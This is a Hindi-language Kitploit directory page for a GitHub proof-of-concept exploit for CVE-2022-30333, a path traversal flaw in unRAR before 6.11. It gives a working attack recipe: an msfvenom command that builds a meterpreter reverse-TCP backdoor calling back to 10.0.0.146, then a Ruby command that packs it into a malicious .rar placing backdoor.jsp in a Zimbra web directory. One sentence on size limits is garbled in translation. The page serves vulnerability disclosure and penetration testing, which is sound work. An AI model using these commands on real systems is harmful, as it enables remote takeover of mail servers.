Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
unrar-cve-2022-30333-poc — CVE-2022-30333 में unRAR में पथ ट्रैवर्सल के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो मनमाने स्थानों पर पेलोड स्थापित करने के लिए दुर्भावनापूर्ण .rar फ़ाइलें उत्पन्न करता है। पेनिट्रेशन टेस्टिंग के लिए Metasploit और msfvenom के साथ एकीकृत होता है। | Kitploit
उपकरण/GitHubGitHub/rbowes-r7/unrar-cve-2022-30333-poc
शोषण फ्रेमवर्कपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubrbowes-r7/unrar-cve-2022-30333-poc

unrar-cve-2022-30333-poc

CVE-2022-30333 में unRAR में पथ ट्रैवर्सल के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो मनमाने स्थानों पर पेलोड स्थापित करने के लिए दुर्भावनापूर्ण .rar फ़ाइलें उत्पन्न करता है। पेनिट्रेशन टेस्टिंग के लिए Metasploit और msfvenom के साथ एकीकृत होता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1454 साल पहलेअभी तक समीक्षित नहीं

CVE-2022-30333 के लिए एक प्रूफ ऑफ कॉन्सेप्ट - यह unRAR के 6.11 से पहले के संस्करणों में एक पथ ट्रावर्सल कमजोरी है। मैंने इसे AttackerKB writeup के लिए एक प्रदर्शन के रूप में बनाया, और इसे जल्द ही एक Metasploit Module में शामिल करने की उम्मीद है!

मूल रूप से, आप एक लक्ष्य (पथ ट्रावर्सल सहित) और कुछ फ़ाइल डेटा प्रदान करते हैं, और यह टूल एक .rar उत्पन्न करेगा जो उस फ़ाइल को उस स्थान पर निकालेगा। अधिकतम फ़ाइल लंबाई 104 बाइट्स है, और अधिकतम फ़ाइल लंबाई 4096 बाइट्स है। (यह कमजोरी में निहित नहीं है, यह सिर्फ वही है जो मैंने फ़ाइल बनाते समय चुना था)।

उदाहरण के लिए, msfvenom के साथ एक बैकडोर बनाएँ:

root@kitploit:~
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp

फिर एक .rar फ़ाइल बनाएँ, .jsp को कहीं मजेदार जगह पर रोपते हुए:

root@kitploit:~
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar
टूल डाउनलोड करें